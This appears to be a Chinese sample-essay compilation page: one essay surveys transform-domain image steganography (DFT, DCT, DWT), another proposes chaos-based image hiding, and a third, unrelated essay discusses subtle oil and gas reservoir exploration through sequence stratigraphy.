变换域隐藏技术就是指将秘密信息嵌入数字图像的某一变换域中。比较常用的是离散傅立叶变换(DFT)、离散余弦变换(DCT)和离散小波变换(DWT)等,它们主要是通过修改载体图像某些指定的频域系数来嵌入数据。其基本思想是利用扩频通信原理来提高隐藏系统的鲁棒性。考虑到对低频区域系数的改动可能会影响到载体图像的感知效果,而高频系数又易被破坏,因此,信息隐藏技术一般选取载体图像中频区域上的系数来嵌入秘密数据,从而使之既满足不可感知性,又满足对诸如失真压缩等操作的鲁棒性。

1.基于DFT的数字图像隐藏算法。基于DFT的数字图像隐藏算法将图像分割成多个感觉频段,然后选择合适部分来嵌入秘密信息。文献[4]提出基于原始图像的傅立叶变换,将调制后的秘密信息依次加入到某些固定位置的幅值谱上,文献[5]利用傅里叶变换的可加性和图象去噪原理提出了一种基于频域的三维运动盲水印算法。傅里叶变换具有一些变换无关的完整特性。例如:空间域的平移只引起频域上的相移,而幅度不变;空间域尺度的缩放会引起频域尺度反向的缩放;空间域旋转的角度和所引起的频域的旋转的角度是一致的。这些特点可以抵御诸如旋转、尺度、平移等几何攻击。2.基于DCT的数字图像隐藏算法。基于DCT域的图像信息隐藏算法的一般步骤为,首先对载体图像分块进行二维DCT变换,然后用秘密信息对DCT系数进行调制,最后对新的系数作离散余弦反变换(IDCT),即可得到隐藏图像,完成信息隐藏过程。基于DCT的信息隐藏算法因其具有较强的鲁棒性,计算量较小,且与国际图像压缩标准(JPEG,MPEG,H.263,H,264等)相兼容(这些标准中均采用DCT变换),因而具有诸多的潜在优势,成为近年来研究最多的一种信息隐藏技术

3.基于DWT的数字图像隐藏算法。基于DWT域的图像信息隐藏算法的一般步骤为,首先对载体图像进行多级离散小波变换,得到不同分辨率下的细节子图和逼近子图,然后用秘密信息对DWT系数进行调制,最后对嵌入秘密信息后的小波系数进行相应级别的离散小波逆变换,完成信息隐藏过程。利用小波变换把原始图像分解成多频段的图像,能适应人眼的视觉特性且使得信息的嵌入和检测可分多个层次进行,小波变换域信息隐藏方法兼具时空域和DCT变换域方法的优点。因此,基于离散小波变换的信息隐藏算法已经成为当前研究的热点和最重要的研究方向。目前,常见的几类小波变换域信息隐藏嵌入算法有:非自适应加性和乘性嵌入方式、基于量化的嵌入方式,基于自适应嵌入方式、基于多分辨率嵌入方式。此外,还有基于替换的嵌入方式,基于树结构的嵌入方式等等。

由于变换域信息隐藏技术是在频域嵌入信息,因此它有频域所固有的抗攻击和变换的能力,使这一隐藏方案对比例变化、JPEG压缩、抖动、剪辑、打印/扫描以及合谋攻击都具有很好的鲁棒性。它的优点体现在以下几点:(1)在变换域中嵌入的信号能量可以分布到空间域的所有像素上,有利于保证秘密信息的不可见性;(2)在变换域中,人类视觉系统的某些特性(如频率掩蔽效应)可以更方便的结合到秘密信息编码过程中,提高算法的鲁棒性;(3)交换域方法与大多数国际数据压缩标准兼容,从而可以直接实现压缩域内的隐藏算法,提高效率,同时,也能抵抗相应的有损压缩。

四、结束语

信息隐藏在信息安全、电子商务、军事、医疗系统、国家情报等方面有着非常重要的意义,正是由于它广泛的应用和重要的地位,使信息隐藏的研究成为科学研究的热点之一。

基于图像的信息隐藏技术具有载体数字图像的一些自身特点,同时具备信息隐藏技术的共性,以图像为载体的信息隐藏技术是信息隐藏研究的一个重要分支。本文主要介绍以数字图像为载体的信息隐藏技术,主要以信息隐藏算法的一般流程为依据,阐述了信息隐藏的基本概念,归纳了信息隐藏的一般模型、基本方法,并分析、总结了该领域的常见经典算法,为下一步的深入研究奠定了坚实的基础。

参考文献:

[1]徐献灵.基于数字图像的信息隐藏技术及其应用[D].中山大学硕士毕业论文,2007

[2]黄爱民,安向京,骆力.数字图像处理与分析基础[M].北京:中国水利水电出版社,2005

[3]王丽娜,张焕国,叶登攀.信息隐藏技术与应用(第二版)[M].武昌:武汉大学出版社,2009

[4]李黎,潘志庚.一种稳健性好的图像盲水印算法[J].中国图像图形学报,2003,8A(5):567-571

隐藏技术论文范文第14篇

提出了一种基于变参数混沌系统的图像隐藏技术。首先,利用变参数混沌系统产生的混沌序列对待隐藏的秘密图像进行加密预处理;而后根据待隐藏图像的大小,把由模板图像按行转换成的一维向量分为若干等份,每一等份唯一对应于待隐藏图像的一个像素;最后,再次利用该混沌系统生成新的混沌序列来确定待隐藏图像的每个像素在每一等份中的位置,并结合图像融合技术把该像素隐藏在该等份的这个位置上。该算法保证了隐藏图像的安全性,提高了隐藏的视觉效果。实验结果证明,本算法具有很好的隐藏效果和较好的鲁棒性。

关键词:混沌系统;混沌序列;图像加密;图像融合;分段线性混沌映射图像隐藏

中图分类号:TP309

文献标志码:A

0引言

目前,对数字图像信息的保护有两种基本技术:数字图像加密技术和数字图像隐藏技术。前者是对数字图像进行位置置乱和灰度变换,隐藏图像中包含的有用信息,为数字图像提供基于内容的保护技术[1-2]。通常,经过加密的图像往往是杂乱无章的,因此,在传输时易于引起攻击者的注意。而后者则充分利用人们“所见即所得”的心理,隐藏秘密信息的存在性,以此来迷惑攻击者,从而使其放弃对图像的破译兴趣。因而,图像隐藏技术成为近年来研究的热点,学者们提出了许多数字图像的隐藏方案[3-16]。但是这些隐藏方案都必须在隐藏信息的不可见性和鲁棒性这一矛盾因素间权衡;同时,由于密钥空间小,很多设计方案都存在或多或少的缺陷[17]。文献[3-6]中方法的隐藏视觉效果较好,但在遭受剪切攻击后,恢复出的隐藏秘密信息同模板图像一样丢失了被剪切部分的数据。文献[7]中提出的隐藏方案易被检测到模板图像中隐藏有秘密图像,且密钥空间小。文献[8-12]中的方法也存在密钥空间太小的问题。比较理想的数字图像隐藏方案是在保证隐藏信息不可见性的条件下,尽可能地提高隐藏图像信息的安全性与鲁棒性。

因此,本文提出一种基于变参数混沌系统[18]与图像融合技术相结合的数字图像隐藏技术,实现了将一幅小图像隐藏在另一幅可以公开的大图像中。算法的基本思想是:利用变参数混沌系统产生的混沌序列来确定待隐藏图像像素的隐藏位置,

并结合图像融合技术把该像素融合到相应份中的相应位置,达到隐藏的目的。利用文献[18]中提出的变参数混沌系统,增大了密钥空间,增强了保密图像的安全性和算法的安全性。实验结果证明,本方案具有很好的隐藏视觉效果和较好的鲁棒性。

1变参数混沌系统

隐藏技术论文范文第15篇

Abstract: The exploration of subtle reservoirs gets domestic and international attention. Subtle reservoirs in our country has a broad exploration prospects and is the major part of China's increased oil and gas reserves in future. Taking the basic methods of stratigraphy as the guide, this paper studied the characteristics of subtle reservoir combining with the Chinese and foreign research results, and explored the best method of the exploration of subtle reservoir.

关键词:隐蔽油气藏;层序地层学;层序面

Key words: subtle reservoir;sequence stratigraphy;sequence surface

中图分类号:P53 文献标识码:A文章编号:1006-4311(2011)04-0065-01

1隐蔽油气藏

目前在我国东部地区,勘探成熟盆地的勘探主要目标就是隐蔽油气藏的勘探。结合国内外的多种隐蔽油气藏的勘探方面的实践和研究成果,可以看出在层序地层学理论和框架下进行综合的分析研究,找到最佳的勘探方法是目前隐秘油气藏勘探比较有效的技术。

1.1 隐蔽油气藏分类隐蔽在储层中能够聚集油气的地方称为圈闭,他也是油气的保存场所,因此圈闭是油气藏分类的主要指标,在圈闭中聚集的具有工业使用价值的油气即为油气藏。按照石油地质学分类,一般可以将圈闭和油气藏按照圈闭所形成的条件和地质情况,大致分为四类,一是构造油气藏/圈闭,地层油气藏/圈闭,水力油气藏/圈闭和复合型油气藏/圈闭。所谓隐蔽油气藏,是那些很难用普通的勘探方法探测到,位置出于比较隐秘的圈闭的各种油气藏,这类油气藏多为岩性地层油气藏,其特殊构造使得自身隐蔽性比较高,发现的几率远小于普通油气藏。隐蔽油气藏这一概念是按照勘探油气藏的难度所提出力度,与其形成原因和类型没有关系,并非特指某一类圈闭。所以在分类中并没有单独列出这一种油气藏。在实际勘探油气藏的过程中,隐蔽油气藏这一概念却有着非常重要的实践意义和理论意义,去隐蔽油气藏进行详细划分也是非常必要的。以便于在实际勘探中根据各种不同隐蔽油气藏,针对其各自特点,采取最佳勘探方式。

1.2 勘探隐蔽油气藏的现状隐蔽油气藏(圈闭)是美国地质学家来复生最先提出的,几十年来各国地质学家对其理论不断扩充,将底层、岩性等融入其中加以整合并取得了巨大进展,新理论新发方法也在实践中得到充分应用,逐渐形成了一套比较完整有效的隐蔽油气藏的勘探方法和技术流程。根据长期的勘探实践经验,在勘探程度比较高的盆地中,有些含量较高的油气藏占到了地质总储量的百分之五十以上,容易形成大型甚至超大型的油气田。所以,即使勘探隐蔽油气藏的难度远大于普通油气藏,但是其更具有勘探意义。虽然隐蔽油气藏分布的隐蔽性比较强,但还是可以抓住其分布特点找到分布规律,在隐蔽油气藏勘探技术水平和地质理论学不断进步的条件下,我们在隐蔽油气藏的勘探方面也取得了巨大进步。

2隐蔽油气藏勘探研究

2.1 层序地层学层序地层学创立于二十世纪八十年代,由Vail在被动大陆边沿海相沉积的研究过程中建立的,后来又Galloway、Jervey等人有陆续创立了成因层序地质学和高密度层序地质学等理论体系。但是,层序地质学是以:周期性的海平面的变化控制回旋的沉积作用为理论基础,另外还包括同时期同勾选会的沉积作用所构成的岩石组合称为层序等。岩相可以按照层序地质学理论的周期性、旋回性、以及等时性等方式进行分类,对其分布的方式和规律做出科学有效的判断。储集岩大多在层序交界的周围发育,但是在层序的内部却形成的是凝缩段沉积,它与周围的岩相相比质地较细,有机质丰富。因为水域比较浅,在湖盆体系位置较低以及扩张的体系中的陆相断陷是受限的,而且有着比较大的落差,因此一般在冲积扇或者扇三角洲沉积地域发育。处于晚期的湖盆收缩体系在其水体的收缩影响下,一般是发展成为进积型和扇型三角洲,还有的发育成泛滥平原沉积,所以在岩层序交界的周围是发现砂体的重点位置。因为相对湖平面的变化为周期变化,从而使其沉积具有多旋回合的特点,同时也促成了陆相断陷湖盆的多套储盖组合的发育,以及多套含油气层的形成。

2.2 建立层序地层的格架首先是对某已知的产油井A和另一干B、C井所形成的共联井,识别出其地震剖面图上的层序交界面,而且不整合不接触上地层和下地层。看层序界面上看,可以明显的看到A井所处的界面有着侵蚀下切地震反说的特点,这符合Ⅰ型层序界面的特点。另外在合成的地震记录中综合标定层序界面和测井层序界面,从而建起一个可以将测井等时层序地层同地震想比较的格架。

2.3 预测生储盖层在将井间等时地层通过做剖面成像时,需要把等时地层的格架选作为基准面,再利用三维提取信息技术,对三维的地震岩层的进行信息采集,然后做沉积微相的平面成像。同时分析地震相关的信息,预测出生储盖的空间分布。从形成时间上来看,烃源岩是在最大湖泛期形成的,在那时期因为相对面的升高速度以及湖盆容积增大的速度都是最快的,因此断陷湖盆也在此时发生欠补偿的沉积,导致了凝缩段沉积。这一沉积是以深色泥岩为主,其成分以含深水介丰富的化石以及夹油页岩,非常有利于油气的生成、保存。在生烃的门限深度下面的凝缩段在油气生成的过程中叶起到了非常重要的作用,这一段属于烃源岩;在生烃的门限深度上面的凝缩段所起的作用主要是对油气进行封堵,这一段是盖层。在湖盆收缩体系的后期阶段以及扩张体系的初期阶段,主要是形成了储集岩,其岩层序界面是非常容易形成下切河道,它非常有利于油气的储集,所以寻找下切河道的正确方向是向着层序界面。

3勘探隐蔽油气藏的发展趋势

目前的层序地层学是以沉积层的旋回性为基本点,按照等时性的要求,做出了岩相分布模式的预测和生储盖层分布的判断。烃源岩和盖层基本上是在湖泛期所形成的,在生烃门限深度下面的凝缩段为烃源岩的形成和发育提供了场所,而生烃门限深度上面的凝缩段为形成油气提供盖层。第二,在储集体的寻找应该在层序界面周围,尤其是在Ⅰ型层序界面附近。第三,形成沉积多旋回性的原因主要是由相对湖平面高低变的周期性所导致的,同时也孕育了断陷湖盆多套生储盖组合以及多套含油气层。隐蔽油气藏的勘探理论和技术发展是一个多学科综合发展的成果,是石油地质综合发展的方向。由于其形成原因复杂,勘探难度大,必须要在现有方法上进行开拓创新、优化技术手段、探寻新的勘探思路,全面对油气藏区域进行识别,评价和选优,并对隐蔽油气藏做预探评价。

参考文献:

[1]胡见义等.非构造油气藏[M].北京:石油工业出版社,2006.

精品推荐